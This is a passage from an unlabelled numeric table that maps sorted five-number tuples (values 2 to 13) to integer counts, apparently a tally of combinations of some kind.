(2, 2, 3, 3, 11): 11,
(2, 2, 3, 3, 12): 18,
(2, 2, 3, 3, 13): 6,
(2, 2, 3, 4, 4): 9,
(2, 2, 3, 4, 5): 15,
(2, 2, 3, 4, 6): 24,
(2, 2, 3, 4, 7): 18,
(2, 2, 3, 4, 8): 25,
(2, 2, 3, 4, 9): 15,
(2, 2, 3, 4, 10): 26,
(2, 2, 3, 4, 11): 20,
(2, 2, 3, 4, 12): 23,
(2, 2, 3, 4, 13): 16,
(2, 2, 3, 5, 5): 8,
(2, 2, 3, 5, 6): 19,
(2, 2, 3, 5, 7): 20,
(2, 2, 3, 5, 8): 17,
(2, 2, 3, 5, 9): 11,
(2, 2, 3, 5, 10): 20,
(2, 2, 3, 5, 11): 15,
(2, 2, 3, 5, 12): 15,
(2, 2, 3, 5, 13): 13,
(2, 2, 3, 6, 6): 22,
(2, 2, 3, 6, 7): 21,
(2, 2, 3, 6, 8): 21,
(2, 2, 3, 6, 9): 36,
(2, 2, 3, 6, 10): 22,
(2, 2, 3, 6, 11): 20,
(2, 2, 3, 6, 12): 37,
(2, 2, 3, 6, 13): 17,
(2, 2, 3, 7, 7): 12,
(2, 2, 3, 7, 8): 19,
(2, 2, 3, 7, 9): 14,
(2, 2, 3, 7, 10): 14,
(2, 2, 3, 7, 11): 15,
(2, 2, 3, 7, 12): 17,
(2, 2, 3, 7, 13): 21,
(2, 2, 3, 8, 8): 12,
(2, 2, 3, 8, 9): 18,
(2, 2, 3, 8, 10): 21,
(2, 2, 3, 8, 11): 12,
(2, 2, 3, 8, 12): 23,
(2, 2, 3, 8, 13): 14,
(2, 2, 3, 9, 9): 13,
(2, 2, 3, 9, 10): 14,
(2, 2, 3, 9, 11): 13,
(2, 2, 3, 9, 12): 24,
(2, 2, 3, 9, 13): 8,
(2, 2, 3, 10, 10): 13,
(2, 2, 3, 10, 11): 18,
(2, 2, 3, 10, 12): 15,
(2, 2, 3, 10, 13): 15,
(2, 2, 3, 11, 11): 4,
(2, 2, 3, 11, 12): 13,
(2, 2, 3, 11, 13): 10,
(2, 2, 3, 12, 12): 12,
(2, 2, 3, 12, 13): 13,
(2, 2, 3, 13, 13): 6,
(2, 2, 4, 4, 4): 2,
(2, 2, 4, 4, 5): 14,
(2, 2, 4, 4, 6): 12,
(2, 2, 4, 4, 7): 12,
(2, 2, 4, 4, 8): 7,
(2, 2, 4, 4, 9): 13,
(2, 2, 4, 4, 10): 13,
(2, 2, 4, 4, 11): 11,
(2, 2, 4, 4, 12): 11,
(2, 2, 4, 4, 13): 14,
(2, 2, 4, 5, 5): 6,
(2, 2, 4, 5, 6): 22,
(2, 2, 4, 5, 7): 18,
(2, 2, 4, 5, 8): 25,
(2, 2, 4, 5, 9): 18,
(2, 2, 4, 5, 10): 20,
(2, 2, 4, 5, 11): 10,
(2, 2, 4, 5, 12): 28,
(2, 2, 4, 5, 13): 11,
(2, 2, 4, 6, 6): 14,
(2, 2, 4, 6, 7): 21,
(2, 2, 4, 6, 8): 32,
(2, 2, 4, 6, 9): 23,
(2, 2, 4, 6, 10): 33,
(2, 2, 4, 6, 11): 27,
(2, 2, 4, 6, 12): 33,
(2, 2, 4, 6, 13): 28,
(2, 2, 4, 7, 7): 15,
(2, 2, 4, 7, 8): 24,
(2, 2, 4, 7, 9): 17,
(2, 2, 4, 7, 10): 25,
(2, 2, 4, 7, 11): 13,
(2, 2, 4, 7, 12): 24,
(2, 2, 4, 7, 13): 13,
(2, 2, 4, 8, 8): 5,
(2, 2, 4, 8, 9): 20,
(2, 2, 4, 8, 10): 33,
(2, 2, 4, 8, 11): 30,
(2, 2, 4, 8, 12): 19,
(2, 2, 4, 8, 13): 19,
(2, 2, 4, 9, 9): 2,
(2, 2, 4, 9, 10): 22,
(2, 2, 4, 9, 11): 12,
(2, 2, 4, 9, 12): 21,
(2, 2, 4, 9, 13): 9,
(2, 2, 4, 10, 10): 12,
(2, 2, 4, 10, 11): 17,
(2, 2, 4, 10, 12): 34,
(2, 2, 4, 10, 13): 15,
(2, 2, 4, 11, 11): 5,
(2, 2, 4, 11, 12): 20,
(2, 2, 4, 11, 13): 6,
(2, 2, 4, 12, 12): 10,
(2, 2, 4, 12, 13): 12,
(2, 2, 4, 13, 13): 5,
(2, 2, 5, 5, 5): 3,
(2, 2, 5, 5, 6): 9,
(2, 2, 5, 5, 7): 9,
(2, 2, 5, 5, 8): 7,
(2, 2, 5, 5, 9): 5,
(2, 2, 5, 5, 10): 6,
(2, 2, 5, 5, 11): 7,
(2, 2, 5, 5, 12): 9,
(2, 2, 5, 5, 13): 8,
(2, 2, 5, 6, 6): 15,
(2, 2, 5, 6, 7): 20,
(2, 2, 5, 6, 8): 33,
(2, 2, 5, 6, 9): 9,
(2, 2, 5, 6, 10): 15,
(2, 2, 5, 6, 11): 16,
(2, 2, 5, 6, 12): 17,
(2, 2, 5, 6, 13): 18,
(2, 2, 5, 7, 7): 10,
(2, 2, 5, 7, 8): 13,
(2, 2, 5, 7, 9): 18,
(2, 2, 5, 7, 10): 16,
(2, 2, 5, 7, 11): 17,
(2, 2, 5, 7, 12): 17,
(2, 2, 5, 7, 13): 11,
(2, 2, 5, 8, 8): 13,
(2, 2, 5, 8, 9): 13,
(2, 2, 5, 8, 10): 21,
(2, 2, 5, 8, 11): 10,
(2, 2, 5, 8, 12): 17,
(2, 2, 5, 8, 13): 6,
(2, 2, 5, 9, 9): 6,
(2, 2, 5, 9, 10): 12,
(2, 2, 5, 9, 11): 6,
(2, 2, 5, 9, 12): 17,
(2, 2, 5, 9, 13): 11,
(2, 2, 5, 10, 10): 9,
(2, 2, 5, 10, 11): 12,
(2, 2, 5, 10, 12): 25,
(2, 2, 5, 10, 13): 11,
(2, 2, 5, 11, 11): 8,
(2, 2, 5, 11, 12): 12,
(2, 2, 5, 11, 13): 6,
(2, 2, 5, 12, 12): 9,
(2, 2, 5, 12, 13): 11,
(2, 2, 5, 13, 13): 3,
(2, 2, 6, 6, 6): 7,
(2, 2, 6, 6, 7): 10,
(2, 2, 6, 6, 8): 8,
(2, 2, 6, 6, 9): 15,
(2, 2, 6, 6, 10): 14,
(2, 2, 6, 6, 11): 11,
(2, 2, 6, 6, 12): 23,
(2, 2, 6, 6, 13): 6,
(2, 2, 6, 7, 7): 12,
(2, 2, 6, 7, 8): 21,
(2, 2, 6, 7, 9): 18,
(2, 2, 6, 7, 10): 23,
(2, 2, 6, 7, 11): 15,
(2, 2, 6, 7, 12): 25,
(2, 2, 6, 7, 13): 10,
(2, 2, 6, 8, 8): 11,
(2, 2, 6, 8, 9): 22,
(2, 2, 6, 8, 10): 30,
(2, 2, 6, 8, 11): 19,
(2, 2, 6, 8, 12): 24,
(2, 2, 6, 8, 13): 18,
(2, 2, 6, 9, 9): 15,
(2, 2, 6, 9, 10): 13,
(2, 2, 6, 9, 11): 5,
(2, 2, 6, 9, 12): 27,
(2, 2, 6, 9, 13): 12,
(2, 2, 6, 10, 10): 8,
(2, 2, 6, 10, 11): 17,
(2, 2, 6, 10, 12): 29,
(2, 2, 6, 10, 13): 15,
(2, 2, 6, 11, 11): 5,
(2, 2, 6, 11, 12): 17,
(2, 2, 6, 11, 13): 7,
(2, 2, 6, 12, 12): 17,
(2, 2, 6, 12, 13): 13,
(2, 2, 6, 13, 13): 4,
(2, 2, 7, 7, 7): 9,
(2, 2, 7, 7, 8): 13,
(2, 2, 7, 7, 9): 11,
(2, 2, 7, 7, 10): 12,
(2, 2, 7, 7, 11): 9,
(2, 2, 7, 7, 12): 10,
(2, 2, 7, 7, 13): 4,
(2, 2, 7, 8, 8): 11,
(2, 2, 7, 8, 9): 13,
(2, 2, 7, 8, 10): 13,
(2, 2, 7, 8, 11): 7,
(2, 2, 7, 8, 12): 23,
(2, 2, 7, 8, 13): 8,
(2, 2, 7, 9, 9): 4,
(2, 2, 7, 9, 10): 12,
(2, 2, 7, 9, 11): 16,
(2, 2, 7, 9, 12): 11,
(2, 2, 7, 9, 13): 9,
(2, 2, 7, 10, 10): 10,
(2, 2, 7, 10, 11): 7,
(2, 2, 7, 10, 12): 21,
(2, 2, 7, 10, 13): 9,
(2, 2, 7, 11, 11): 4,
(2, 2, 7, 11, 12): 12,
(2, 2, 7, 11, 13): 14,
(2, 2, 7, 12, 12): 7,
(2, 2, 7, 12, 13): 11,
(2, 2, 7, 13, 13): 5,
(2, 2, 8, 8, 8): 3,
(2, 2, 8, 8, 9): 8,
(2, 2, 8, 8, 10): 13,
(2, 2, 8, 8, 11): 17,
(2, 2, 8, 8, 12): 9,
(2, 2, 8, 8, 13): 9,
(2, 2, 8, 9, 9): 1,
(2, 2, 8, 9, 10): 16,
(2, 2, 8, 9, 11): 5,
(2, 2, 8, 9, 12): 19,
(2, 2, 8, 9, 13): 7,
(2, 2, 8, 10, 10): 11,
(2, 2, 8, 10, 11): 12,
(2, 2, 8, 10, 12): 15,
(2, 2, 8, 10, 13): 11,
(2, 2, 8, 11, 11): 3,
(2, 2, 8, 11, 12): 13,
(2, 2, 8, 11, 13): 7,
(2, 2, 8, 12, 12): 9,
(2, 2, 8, 12, 13): 13,
(2, 2, 8, 13, 13): 5,
(2, 2, 9, 9, 10): 3,
(2, 2, 9, 9, 11): 3,
(2, 2, 9, 9, 12): 10,
(2, 2, 9, 9, 13): 4,
(2, 2, 9, 10, 10): 5,
(2, 2, 9, 10, 11): 10,
(2, 2, 9, 10, 12): 14,
(2, 2, 9, 10, 13): 4,
(2, 2, 9, 11, 11): 7,
(2, 2, 9, 11, 12): 5,
(2, 2, 9, 11, 13): 6,
(2, 2, 9, 12, 12): 11,
(2, 2, 9, 12, 13): 5,
(2, 2, 9, 13, 13): 3,
(2, 2, 10, 10, 10): 3,
(2, 2, 10, 10, 11): 4,
(2, 2, 10, 10, 12): 10,
(2, 2, 10, 10, 13): 6,
(2, 2, 10, 11, 11): 5,
(2, 2, 10, 11, 12): 10,
(2, 2, 10, 11, 13): 8,
(2, 2, 10, 12, 12): 9,
(2, 2, 10, 12, 13): 9,
(2, 2, 10, 13, 13): 6,
(2, 2, 11, 11, 11): 2,
(2, 2, 11, 11, 12): 4,
(2, 2, 11, 11, 13): 5,
(2, 2, 11, 12, 12): 5,
(2, 2, 11, 12, 13): 5,
(2, 2, 11, 13, 13): 1,
(2, 2, 12, 12, 12): 4,
(2, 2, 12, 12, 13): 7,
(2, 2, 12, 13, 13): 4,
(2, 3, 3, 3, 3): 4,
(2, 3, 3, 3, 4): 6,
(2, 3, 3, 3, 5): 9,
(2, 3, 3, 3, 6): 12,
(2, 3, 3, 3, 7): 9,
(2, 3, 3, 3, 8): 8,
(2, 3, 3, 3, 9): 11,
(2, 3, 3, 3, 10): 10,
(2, 3, 3, 3, 11): 9,
(2, 3, 3, 3, 12): 10,
(2, 3, 3, 3, 13): 10,
(2, 3, 3, 4, 4): 12,
(2, 3, 3, 4, 5): 14,
(2, 3, 3, 4, 6): 33,
(2, 3, 3, 4, 7): 15,
(2, 3, 3, 4, 8): 18,
(2, 3, 3, 4, 9): 26,
(2, 3, 3, 4, 10): 15,
(2, 3, 3, 4, 11): 12,
(2, 3, 3, 4, 12): 31,
(2, 3, 3, 4, 13): 13,
(2, 3, 3, 5, 5): 9,
(2, 3, 3, 5, 6): 22,
(2, 3, 3, 5, 7): 16,
(2, 3, 3, 5, 8): 11,
(2, 3, 3, 5, 9): 31,
(2, 3, 3, 5, 10): 19,
(2, 3, 3, 5, 11): 11,
(2, 3, 3, 5, 12): 20,
(2, 3, 3, 5, 13): 9,
(2, 3, 3, 6, 6): 21,
(2, 3, 3, 6, 7): 21,
(2, 3, 3, 6, 8): 30,
(2, 3, 3, 6, 9): 30,
(2, 3, 3, 6, 10): 32,
(2, 3, 3, 6, 11): 17,
(2, 3, 3, 6, 12): 36,
(2, 3, 3, 6, 13): 17,
(2, 3, 3, 7, 7): 12,
(2, 3, 3, 7, 8): 11,
(2, 3, 3, 7, 9): 26,
(2, 3, 3, 7, 10): 15,
(2, 3, 3, 7, 11): 13,
(2, 3, 3, 7, 12): 21,
(2, 3, 3, 7, 13): 16,
(2, 3, 3, 8, 8): 8,
(2, 3, 3, 8, 9): 15,
(2, 3, 3, 8, 10): 6,
(2, 3, 3, 8, 11): 11,
(2, 3, 3, 8, 12): 29,
(2, 3, 3, 8, 13): 11,
(2, 3, 3, 9, 9): 12,
(2, 3, 3, 9, 10): 18,
(2, 3, 3, 9, 11): 21,
(2, 3, 3, 9, 12): 27,
(2, 3, 3, 9, 13): 20,
(2, 3, 3, 10, 10): 7,
(2, 3, 3, 10, 11): 8,
(2, 3, 3, 10, 12): 21,
(2, 3, 3, 10, 13): 8,
(2, 3, 3, 11, 11): 8,
(2, 3, 3, 11, 12): 13,
(2, 3, 3, 11, 13): 10,
(2, 3, 3, 12, 12): 18,
(2, 3, 3, 12, 13): 12,
(2, 3, 3, 13, 13): 3,
(2, 3, 4, 4, 4): 9,
(2, 3, 4, 4, 5): 16,
(2, 3, 4, 4, 6): 21,
(2, 3, 4, 4, 7): 25,
(2, 3, 4, 4, 8): 26,
(2, 3, 4, 4, 9): 23,
(2, 3, 4, 4, 10): 22,
(2, 3, 4, 4, 11): 16,
(2, 3, 4, 4, 12): 28,
(2, 3, 4, 4, 13): 16,
(2, 3, 4, 5, 5): 12,
(2, 3, 4, 5, 6): 27,
(2, 3, 4, 5, 7): 26,
(2, 3, 4, 5, 8): 34,
(2, 3, 4, 5, 9): 28,
(2, 3, 4, 5, 10): 24,
(2, 3, 4, 5, 11): 22,
(2, 3, 4, 5, 12): 30,
(2, 3, 4, 5, 13): 28,
(2, 3, 4, 6, 6): 35,
(2, 3, 4, 6, 7): 36,
(2, 3, 4, 6, 8): 41,
(2, 3, 4, 6, 9): 51,
(2, 3, 4, 6, 10): 33,
(2, 3, 4, 6, 11): 24,
(2, 3, 4, 6, 12): 62,
(2, 3, 4, 6, 13): 28,
(2, 3, 4, 7, 7): 17,
(2, 3, 4, 7, 8): 33,
(2, 3, 4, 7, 9): 31,
(2, 3, 4, 7, 10): 41,
(2, 3, 4, 7, 11): 34,
(2, 3, 4, 7, 12): 32,
(2, 3, 4, 7, 13): 23,
(2, 3, 4, 8, 8): 20,
(2, 3, 4, 8, 9): 30,
(2, 3, 4, 8, 10): 40,
(2, 3, 4, 8, 11): 26,
(2, 3, 4, 8, 12): 43,
(2, 3, 4, 8, 13): 16,
(2, 3, 4, 9, 9): 21,
(2, 3, 4, 9, 10): 17,
(2, 3, 4, 9, 11): 19,
(2, 3, 4, 9, 12): 50,
(2, 3, 4, 9, 13): 25,
(2, 3, 4, 10, 10): 16,
(2, 3, 4, 10, 11): 22,
(2, 3, 4, 10, 12): 38,
(2, 3, 4, 10, 13): 25,
(2, 3, 4, 11, 11): 13,
(2, 3, 4, 11, 12): 23,
(2, 3, 4, 11, 13): 21,
(2, 3, 4, 12, 12): 33,
(2, 3, 4, 12, 13): 20,
(2, 3, 4, 13, 13): 6,
(2, 3, 5, 5, 5): 2,
(2, 3, 5, 5, 6): 15,
(2, 3, 5, 5, 7): 14,
(2, 3, 5, 5, 8): 15,
(2, 3, 5, 5, 9): 15,
(2, 3, 5, 5, 10): 14,
(2, 3, 5, 5, 11): 12,
(2, 3, 5, 5, 12): 18,
(2, 3, 5, 5, 13): 11,
(2, 3, 5, 6, 6): 26,
(2, 3, 5, 6, 7): 27,
(2, 3, 5, 6, 8): 30,
(2, 3, 5, 6, 9): 30,
(2, 3, 5, 6, 10): 24,
(2, 3, 5, 6, 11): 27,
(2, 3, 5, 6, 12): 53,
(2, 3, 5, 6, 13): 23,
(2, 3, 5, 7, 7): 18,
(2, 3, 5, 7, 8): 28,
(2, 3, 5, 7, 9): 27,
(2, 3, 5, 7, 10): 31,
(2, 3, 5, 7, 11): 25,
(2, 3, 5, 7, 12): 32,
(2, 3, 5, 7, 13): 22,
(2, 3, 5, 8, 8): 11,
(2, 3, 5, 8, 9): 25,
(2, 3, 5, 8, 10): 34,
(2, 3, 5, 8, 11): 27,
(2, 3, 5, 8, 12): 19,
(2, 3, 5, 8, 13): 19,
(2, 3, 5, 9, 9): 22,
(2, 3, 5, 9, 10): 21,
(2, 3, 5, 9, 11): 23,
(2, 3, 5, 9, 12): 32,
(2, 3, 5, 9, 13): 19,
(2, 3, 5, 10, 10): 8,
(2, 3, 5, 10, 11): 17,
(2, 3, 5, 10, 12): 23,
(2, 3, 5, 10, 13): 25,
(2, 3, 5, 11, 11): 5,
(2, 3, 5, 11, 12): 24,
(2, 3, 5, 11, 13): 23,
(2, 3, 5, 12, 12): 18,
(2, 3, 5, 12, 13): 14,
(2, 3, 5, 13, 13): 11,
(2, 3, 6, 6, 6): 15,
(2, 3, 6, 6, 7): 16,
(2, 3, 6, 6, 8): 28,
(2, 3, 6, 6, 9): 30,
(2, 3, 6, 6, 10): 27,
(2, 3, 6, 6, 11): 26,
(2, 3, 6, 6, 12): 44,
(2, 3, 6, 6, 13): 23,
(2, 3, 6, 7, 7): 21,
(2, 3, 6, 7, 8): 26,
(2, 3, 6, 7, 9): 36,
(2, 3, 6, 7, 10): 32,
(2, 3, 6, 7, 11): 23,
(2, 3, 6, 7, 12): 35,
(2, 3, 6, 7, 13): 23,
(2, 3, 6, 8, 8): 15,
(2, 3, 6, 8, 9): 46,
(2, 3, 6, 8, 10): 35,
(2, 3, 6, 8, 11): 20,
(2, 3, 6, 8, 12): 49,
(2, 3, 6, 8, 13): 11,
(2, 3, 6, 9, 9): 24,
(2, 3, 6, 9, 10): 40,
(2, 3, 6, 9, 11): 28,
(2, 3, 6, 9, 12): 53,
(2, 3, 6, 9, 13): 33,
(2, 3, 6, 10, 10): 16,
(2, 3, 6, 10, 11): 19,
(2, 3, 6, 10, 12): 47,
(2, 3, 6, 10, 13): 23,
(2, 3, 6, 11, 11): 16,
(2, 3, 6, 11, 12): 31,
(2, 3, 6, 11, 13): 16,
(2, 3, 6, 12, 12): 29,
(2, 3, 6, 12, 13): 25,
(2, 3, 6, 13, 13): 12,
(2, 3, 7, 7, 7): 10,
(2, 3, 7, 7, 8): 17,
(2, 3, 7, 7, 9): 13,
(2, 3, 7, 7, 10): 12,
(2, 3, 7, 7, 11): 18,
(2, 3, 7, 7, 12): 20,
(2, 3, 7, 7, 13): 13,
(2, 3, 7, 8, 8): 10,
(2, 3, 7, 8, 9): 20,
(2, 3, 7, 8, 10): 22,
(2, 3, 7, 8, 11): 14,
(2, 3, 7, 8, 12): 24,
(2, 3, 7, 8, 13): 27,
(2, 3, 7, 9, 9): 21,
(2, 3, 7, 9, 10): 19,
(2, 3, 7, 9, 11): 19,
(2, 3, 7, 9, 12): 29,
(2, 3, 7, 9, 13): 17,
(2, 3, 7, 10, 10): 11,
(2, 3, 7, 10, 11): 28,
(2, 3, 7, 10, 12): 21,
(2, 3, 7, 10, 13): 14,
(2, 3, 7, 11, 11): 8,
(2, 3, 7, 11, 12): 19,
(2, 3, 7, 11, 13): 15,
(2, 3, 7, 12, 12): 19,
(2, 3, 7, 12, 13): 18,
(2, 3, 7, 13, 13): 7,
(2, 3, 8, 8, 8): 8,
(2, 3, 8, 8, 9): 8,
(2, 3, 8, 8, 10): 10,
(2, 3, 8, 8, 11): 9,
(2, 3, 8, 8, 12): 13,
(2, 3, 8, 8, 13): 9,
(2, 3, 8, 9, 9): 12,
(2, 3, 8, 9, 10): 18,
(2, 3, 8, 9, 11): 25,
(2, 3, 8, 9, 12): 39,
(2, 3, 8, 9, 13): 11,
(2, 3, 8, 10, 10): 20,
(2, 3, 8, 10, 11): 17,
(2, 3, 8, 10, 12): 28,
(2, 3, 8, 10, 13): 18,
(2, 3, 8, 11, 11): 7,
(2, 3, 8, 11, 12): 17,
(2, 3, 8, 11, 13): 17,
(2, 3, 8, 12, 12): 23,
(2, 3, 8, 12, 13): 15,
(2, 3, 8, 13, 13): 8,
(2, 3, 9, 9, 9): 10,
(2, 3, 9, 9, 10): 15,
(2, 3, 9, 9, 11): 23,
(2, 3, 9, 9, 12): 18,
(2, 3, 9, 9, 13): 17,
(2, 3, 9, 10, 10): 13,
(2, 3, 9, 10, 11): 7,
(2, 3, 9, 10, 12): 23,
(2, 3, 9, 10, 13): 14,
(2, 3, 9, 11, 11): 4,
(2, 3, 9, 11, 12): 23,
(2, 3, 9, 11, 13): 18,
(2, 3, 9, 12, 12): 21,
(2, 3, 9, 12, 13): 18,
(2, 3, 9, 13, 13): 3,
(2, 3, 10, 10, 10): 2,
(2, 3, 10, 10, 11): 12,
(2, 3, 10, 10, 12): 11,
(2, 3, 10, 10, 13): 11,
(2, 3, 10, 11, 11): 6,
(2, 3, 10, 11, 12): 11,
(2, 3, 10, 11, 13): 11,
(2, 3, 10, 12, 12): 21,
(2, 3, 10, 12, 13): 10,
(2, 3, 10, 13, 13): 8,
(2, 3, 11, 11, 11): 4,
(2, 3, 11, 11, 12): 8,
(2, 3, 11, 11, 13): 8,
(2, 3, 11, 12, 12): 18,
(2, 3, 11, 12, 13): 19,
(2, 3, 11, 13, 13): 9,
(2, 3, 12, 12, 12): 13,
(2, 3, 12, 12, 13): 12,
(2, 3, 12, 13, 13): 6,
(2, 3, 13, 13, 13): 4,
(2, 4, 4, 4, 5): 11,
(2, 4, 4, 4, 6): 11,
(2, 4, 4, 4, 7): 11,
(2, 4, 4, 4, 8): 6,
(2, 4, 4, 4, 9): 10,
(2, 4, 4, 4, 10): 10,
(2, 4, 4, 4, 11): 14,
(2, 4, 4, 4, 12): 9,
(2, 4, 4, 4, 13): 10,
(2, 4, 4, 5, 5): 9,
(2, 4, 4, 5, 6): 19,
(2, 4, 4, 5, 7): 17,
(2, 4, 4, 5, 8): 25,
(2, 4, 4, 5, 9): 13,
(2, 4, 4, 5, 10): 22,
(2, 4, 4, 5, 11): 10,
(2, 4, 4, 5, 12): 24,
(2, 4, 4, 5, 13): 10,
(2, 4, 4, 6, 6): 15,
(2, 4, 4, 6, 7): 19,
(2, 4, 4, 6, 8): 20,
(2, 4, 4, 6, 9): 17,
(2, 4, 4, 6, 10): 28,
(2, 4, 4, 6, 11): 19,
(2, 4, 4, 6, 12): 22,
(2, 4, 4, 6, 13): 15,
(2, 4, 4, 7, 7): 13,
(2, 4, 4, 7, 8): 20,
(2, 4, 4, 7, 9): 12,
(2, 4, 4, 7, 10): 18,
(2, 4, 4, 7, 11): 14,
(2, 4, 4, 7, 12): 28,
(2, 4, 4, 7, 13): 7,
(2, 4, 4, 8, 8): 7,
(2, 4, 4, 8, 9): 27,
(2, 4, 4, 8, 10): 21,
(2, 4, 4, 8, 11): 25,
(2, 4, 4, 8, 12): 22,
(2, 4, 4, 8, 13): 23,
(2, 4, 4, 9, 9): 3,
(2, 4, 4, 9, 10): 11,
(2, 4, 4, 9, 11): 8,
(2, 4, 4, 9, 12): 24,
(2, 4, 4, 9, 13): 6,
(2, 4, 4, 10, 10): 16,
(2, 4, 4, 10, 11): 11,
(2, 4, 4, 10, 12): 19,
(2, 4, 4, 10, 13): 9,
(2, 4, 4, 11, 11): 4,
(2, 4, 4, 11, 12): 23,
(2, 4, 4, 11, 13): 1,
(2, 4, 4, 12, 12): 15,
(2, 4, 4, 12, 13): 15,
(2, 4, 4, 13, 13): 4,
(2, 4, 5, 5, 5): 6,
(2, 4, 5, 5, 6): 17,
(2, 4, 5, 5, 7): 13,
(2, 4, 5, 5, 8): 16,
(2, 4, 5, 5, 9): 13,
(2, 4, 5, 5, 10): 16,
(2, 4, 5, 5, 11): 15,
(2, 4, 5, 5, 12): 16,
(2, 4, 5, 5, 13): 9,
(2, 4, 5, 6, 6): 22,
(2, 4, 5, 6, 7): 19,
(2, 4, 5, 6, 8): 39,
(2, 4, 5, 6, 9): 23,
(2, 4, 5, 6, 10): 41,
(2, 4, 5, 6, 11): 25,
(2, 4, 5, 6, 12): 32,
(2, 4, 5, 6, 13): 16,
(2, 4, 5, 7, 7): 23,
(2, 4, 5, 7, 8): 23,
(2, 4, 5, 7, 9): 29,
(2, 4, 5, 7, 10): 17,
(2, 4, 5, 7, 11): 18,
(2, 4, 5, 7, 12): 30,
(2, 4, 5, 7, 13): 21,
(2, 4, 5, 8, 8): 28,
(2, 4, 5, 8, 9): 13,
(2, 4, 5, 8, 10): 28,
(2, 4, 5, 8, 11): 14,
(2, 4, 5, 8, 12): 44,
(2, 4, 5, 8, 13): 14,
(2, 4, 5, 9, 9): 11,
(2, 4, 5, 9, 10): 32,
(2, 4, 5, 9, 11): 27,
(2, 4, 5, 9, 12): 17,
(2, 4, 5, 9, 13): 12,
(2, 4, 5, 10, 10): 14,
(2, 4, 5, 10, 11): 12,
(2, 4, 5, 10, 12): 26,
(2, 4, 5, 10, 13): 20,
(2, 4, 5, 11, 11): 10,
(2, 4, 5, 11, 12): 14,
(2, 4, 5, 11, 13): 18,
(2, 4, 5, 12, 12): 20,
(2, 4, 5, 12, 13): 17,
(2, 4, 5, 13, 13): 10,
(2, 4, 6, 6, 6): 13,
(2, 4, 6, 6, 7): 13,
(2, 4, 6, 6, 8): 23,
(2, 4, 6, 6, 9): 33,
(2, 4, 6, 6, 10): 22,
(2, 4, 6, 6, 11): 15,
(2, 4, 6, 6, 12): 41,
(2, 4, 6, 6, 13): 13,
(2, 4, 6, 7, 7): 23,
(2, 4, 6, 7, 8): 32,
(2, 4, 6, 7, 9): 23,
(2, 4, 6, 7, 10): 37,
(2, 4, 6, 7, 11): 18,
(2, 4, 6, 7, 12): 35,
(2, 4, 6, 7, 13): 31,
(2, 4, 6, 8, 8): 21,
(2, 4, 6, 8, 9): 34,
(2, 4, 6, 8, 10): 38,
(2, 4, 6, 8, 11): 29,
(2, 4, 6, 8, 12): 45,
(2, 4, 6, 8, 13): 30,
(2, 4, 6, 9, 9): 27,
(2, 4, 6, 9, 10): 33,
(2, 4, 6, 9, 11): 17,
(2, 4, 6, 9, 12): 49,
(2, 4, 6, 9, 13): 9,
(2, 4, 6, 10, 10): 32,
(2, 4, 6, 10, 11): 32,
(2, 4, 6, 10, 12): 37,
(2, 4, 6, 10, 13): 25,
(2, 4, 6, 11, 11): 13,
(2, 4, 6, 11, 12): 24,
(2, 4, 6, 11, 13): 13,
(2, 4, 6, 12, 12): 28,
(2, 4, 6, 12, 13): 30,
(2, 4, 6, 13, 13): 11,
(2, 4, 7, 7, 7): 12,
(2, 4, 7, 7, 8): 16,
(2, 4, 7, 7, 9): 17,
(2, 4, 7, 7, 10): 20,
(2, 4, 7, 7, 11): 17,
(2, 4, 7, 7, 12): 18,
(2, 4, 7, 7, 13): 9,
(2, 4, 7, 8, 8): 17,
(2, 4, 7, 8, 9): 21,
(2, 4, 7, 8, 10): 29,
(2, 4, 7, 8, 11): 17,
(2, 4, 7, 8, 12): 45,
(2, 4, 7, 8, 13): 11,
(2, 4, 7, 9, 9): 11,
(2, 4, 7, 9, 10): 19,
(2, 4, 7, 9, 11): 16,
(2, 4, 7, 9, 12): 18,
(2, 4, 7, 9, 13): 22,
(2, 4, 7, 10, 10): 14,
(2, 4, 7, 10, 11): 23,
(2, 4, 7, 10, 12): 40,
(2, 4, 7, 10, 13): 15,
(2, 4, 7, 11, 11): 14,
(2, 4, 7, 11, 12): 26,
(2, 4, 7, 11, 13): 16,
(2, 4, 7, 12, 12): 19,
(2, 4, 7, 12, 13): 13,
(2, 4, 7, 13, 13): 8,
(2, 4, 8, 8, 8): 4,
(2, 4, 8, 8, 9): 22,
(2, 4, 8, 8, 10): 23,
(2, 4, 8, 8, 11): 22,
(2, 4, 8, 8, 12): 19,
(2, 4, 8, 8, 13): 17,
(2, 4, 8, 9, 9): 7,
(2, 4, 8, 9, 10): 25,
(2, 4, 8, 9, 11): 15,
(2, 4, 8, 9, 12): 35,
(2, 4, 8, 9, 13): 13,
(2, 4, 8, 10, 10): 21,
(2, 4, 8, 10, 11): 17,
(2, 4, 8, 10, 12): 38,
(2, 4, 8, 10, 13): 25,
(2, 4, 8, 11, 11): 9,
(2, 4, 8, 11, 12): 37,
(2, 4, 8, 11, 13): 5,
(2, 4, 8, 12, 12): 18,
(2, 4, 8, 12, 13): 26,
(2, 4, 8, 13, 13): 9,
(2, 4, 9, 9, 9): 1,
(2, 4, 9, 9, 10): 7,
(2, 4, 9, 9, 11): 9,
(2, 4, 9, 9, 12): 25,
(2, 4, 9, 9, 13): 4,
(2, 4, 9, 10, 10): 14,
(2, 4, 9, 10, 11): 12,
(2, 4, 9, 10, 12): 24,
(2, 4, 9, 10, 13): 19,
(2, 4, 9, 11, 11): 6,
(2, 4, 9, 11, 12): 7,
(2, 4, 9, 11, 13): 19,
(2, 4, 9, 12, 12): 25,
(2, 4, 9, 12, 13): 11,
(2, 4, 9, 13, 13): 7,
(2, 4, 10, 10, 10): 6,
(2, 4, 10, 10, 11): 11,
(2, 4, 10, 10, 12): 13,
(2, 4, 10, 10, 13): 8,
(2, 4, 10, 11, 11): 11,
(2, 4, 10, 11, 12): 15,
(2, 4, 10, 11, 13): 11,
(2, 4, 10, 12, 12): 15,
(2, 4, 10, 12, 13): 30,
(2, 4, 10, 13, 13): 9,
(2, 4, 11, 11, 11): 3,
(2, 4, 11, 11, 12): 12,
(2, 4, 11, 11, 13): 3,
(2, 4, 11, 12, 12): 13,
(2, 4, 11, 12, 13): 11,
(2, 4, 11, 13, 13): 8,
(2, 4, 12, 12, 12): 14,
(2, 4, 12, 12, 13): 11,
(2, 4, 12, 13, 13): 7,
(2, 5, 5, 5, 5): 1,
(2, 5, 5, 5, 6): 5,
(2, 5, 5, 5, 7): 4,
(2, 5, 5, 5, 8): 2,
(2, 5, 5, 5, 9): 6,
(2, 5, 5, 5, 10): 4,
(2, 5, 5, 5, 11): 5,
(2, 5, 5, 5, 12): 5,
(2, 5, 5, 5, 13): 3,
